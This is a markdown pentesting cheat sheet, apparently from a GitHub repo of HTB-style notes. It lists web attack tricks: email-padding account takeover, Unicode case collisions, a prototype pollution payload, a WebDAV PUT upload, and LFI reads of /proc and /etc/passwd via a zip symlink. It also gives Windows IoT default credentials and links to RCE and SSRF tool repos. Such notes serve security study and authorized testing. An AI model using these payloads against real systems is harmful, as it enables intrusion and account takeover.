Skip to content

Latest commit

 

History

History
95 lines (65 loc) · 2.62 KB

webserver.md

File metadata and controls

95 lines (65 loc) · 2.62 KB
Raw

Login exploits

1. While registering account, try to append a space at the end of already registered email to attempt user account takeover(db removes trailing space while inserting however application not).

2. If email maximum length is fixed and characters after allowed length are stripped, try to register an email having spaces appended till maximum character length + any character at end, eg <admin@htb.com      #>.

Unicode Collisions

unicode characters collide with few english characters. This fact can be used to exploit functionalities like - when Forgot password emails validated against lowercase/uppercase value on file, but sent to the provided input email.

// https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/

//uppercase scenario
chr(0x017f).upper()=='S'	# returns True
chr(0x0131).upper()=='I'

// lowercase scenario
chr(0x212A).lower()=='k'

Javascript prototype pollution

Using this bug, we can set new properties of objects. Eg- we can set json object {"user":"test"} new property admin=true if server takes json data and sets attributes using it.

payload {"user":"test","__proto__":{"admin":true}}

a={}
b=1
c='ds'

# polluting prototype
a.__proto__.foo='bar'

# All objects have foo property now with value bar
d=new Object
d.foo=='bar'	# true
b.foo=='bar'	# true

WebDAV/PUT method enabled

curl -X PUT http://192.168.14.129/dav/test.txt
cadaver http://target/dav

LFI

cat /proc/version
cat /etc/issue
cat /proc/self/environ
cat /proc/net/tcp	# listening processes tcp
cat /proc/net/udp	# listening processes udp

Universal Plug and Play UPnP

  • Windows Device Portal - port 8080

    Windows IoT Core devices support a special webserver called the Device Portal. Windows Device Portal runs on port 8080 in Development mode and has default credentials as Administrator and p@ssw0rd (zero).

    RCE can be acheived using the vulnerability in Sirep/WPCon communications protocol included with Windows IoT operating system.

     // git clone the repo
 https://github.com/SafeBreach-Labs/SirepRAT

  • CallStranger(CVE-2020-12695) Vulnerability - port 37215

    The vulnerability – CallStranger – is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF-like vulnerability.

     // git clone the repo
 https://github.com/yunuscadirci/CallStranger

Zip Symlink

If zip files can be uploaded and content is accessible. Try to access local files using this bug.

mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt 		# prints content of /etc/passwd
zip --symlinks -r test.zip test/
unzip -l test.zip